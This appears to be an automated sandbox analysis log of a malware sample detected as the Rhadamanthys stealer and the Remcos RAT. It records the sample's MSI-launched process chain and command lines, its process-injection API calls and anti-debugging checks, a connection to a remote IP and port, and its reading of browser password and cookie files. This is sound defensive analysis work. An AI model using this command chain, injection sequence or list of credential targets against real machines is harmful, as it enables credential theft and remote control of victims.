                  Source: C:\Users\user\task.exeCode function: 22_2_000A97E9 FindFirstFileExA,22_2_000A97E9
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B903 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0006B903
                  Source: C:\Users\user\task.exeCode function: 22_2_00068D46 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_00068D46
                  Source: C:\Users\user\task.exeCode function: 22_2_00077DE7 FindFirstFileW,FindNextFileW,FindNextFileW,22_2_00077DE7
                  Source: C:\Users\user\task.exeCode function: 22_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,22_2_100010F1
                  Source: C:\Users\user\task.exeCode function: 22_2_10006580 FindFirstFileExA,22_2_10006580
                  Source: C:\Users\user\task.exeCode function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Users\user\task.exeCode function: 22_2_0006771B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,22_2_0006771B
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8C93B0 GetSystemInfo,8_2_6C8C93B0
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                  Source: svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: task.exe, 00000016.00000003.1648607977.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646821801.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1639168513.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1643644507.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.00000000008A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000001F.00000002.1764735514.000000000325C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDPv6 Service Provider
                  Source: svchost.exe, 0000001F.00000002.1764690354.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: task.exe, 0000001E.00000002.4488282758.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8D8D40 LdrInitializeThunk,WSAStartup,WSACleanup,8_2_6C8D8D40
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F84FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C8F84FB
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DB840 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,8_2_6C8DB840
                  Source: C:\Users\user\task.exeCode function: 22_2_0009FDBE mov eax, dword ptr fs:[00000030h]22_2_0009FDBE
                  Source: C:\Users\user\task.exeCode function: 22_2_10004AB4 mov eax, dword ptr fs:[00000030h]22_2_10004AB4
                  Source: C:\Users\user\task.exeCode function: 22_2_0258F829 mov eax, dword ptr fs:[00000030h]22_2_0258F829
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C904D50 GetProcessHeap,HeapAlloc,8_2_6C904D50
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F84FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C8F84FB
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F1134 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6C8F1134
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F12F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6C8F12F8
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE984FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6FE984FB
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE912F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_6FE912F8
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE91134 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_6FE91134
                  Source: C:\Users\user\task.exeCode function: 22_2_00092484 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00092484
                  Source: C:\Users\user\task.exeCode function: 22_2_000994A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000994A3
                  Source: C:\Users\user\task.exeCode function: 22_2_0009297F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0009297F
                  Source: C:\Users\user\task.exeCode function: 22_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_100060E2
                  Source: C:\Users\user\task.exeCode function: 22_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_10002B1C
                  Source: C:\Users\user\task.exeCode function: 22_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_10002639
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 179.43.171.196 5982
                  Allocates memory in foreign processes
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 20A308F0000 protect: page read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\task.exeCode function: 22_2_00076447 GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,22_2_00076447
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\task.exeSection loaded: NULL target: C:\Users\user\task.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: NULL target: C:\Users\user\task.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: NULL target: C:\Users\user\task.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: NULL target: C:\Users\user\task.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 20A308F0000
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF733CD14E0
                  Source: C:\Users\user\task.exeCode function: 22_2_00077936 mouse_event,22_2_00077936
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe" Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exeJump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"Jump to behavior
                  Source: C:\Users\user\task.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                  Source: task.exe, 00000016.00000002.4497115014.0000000003660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: task.exe, 00000016.00000002.4497115014.0000000003660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                  Source: task.exe, 00000016.00000002.4490232230.0000000000879000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F141F cpuid 8_2_6C8F141F
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoA,22_2_0006E42E
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,22_2_000AF090
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000A50DE
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AF197
                  Source: C:\Users\user\task.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_000AF264
                  Source: C:\Users\user\task.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,22_2_000AE92C
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AEAFB
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEBA4
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000A4BD6
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEBEF
                  Source: C:\Users\user\task.exeCode function: EnumSystemLocalesW,22_2_000AEC8A
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,22_2_000AED17
                  Source: C:\Users\user\task.exeCode function: GetLocaleInfoW,22_2_000AEF67
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\data.bin VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\task.exeQueries volume information: C:\Users\user\data.bin VolumeInformationJump to behavior
                  Source: C:\Users\user\task.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\task.exeQueries volume information: C:\Users\user\data.bin VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F0D83 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_6C8F0D83
                  Source: C:\Users\user\task.exeCode function: 22_2_000798EE GetComputerNameExW,GetUserNameW,22_2_000798EE
                  Source: C:\Users\user\task.exeCode function: 22_2_000A5981 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,22_2_000A5981
                  Source: C:\Users\user\task.exeCode function: 24_2_0041739B GetVersionExW,24_2_0041739B
                  Source: C:\Windows\SysWOW64\expand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RHADAMANTHYS Stealer
                  Source: Yara matchFile source: 0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1674900501.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1662192131.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.1765068419.0000000003490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\task.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data22_2_0006B5CA
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\task.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\22_2_0006B6E8
                  Source: C:\Users\user\task.exeCode function: \key3.db22_2_0006B6E8
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\safebrowsing
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ca4gppea.default
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\doomed
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\safebrowsing\google4
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\entries
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\thumbnails
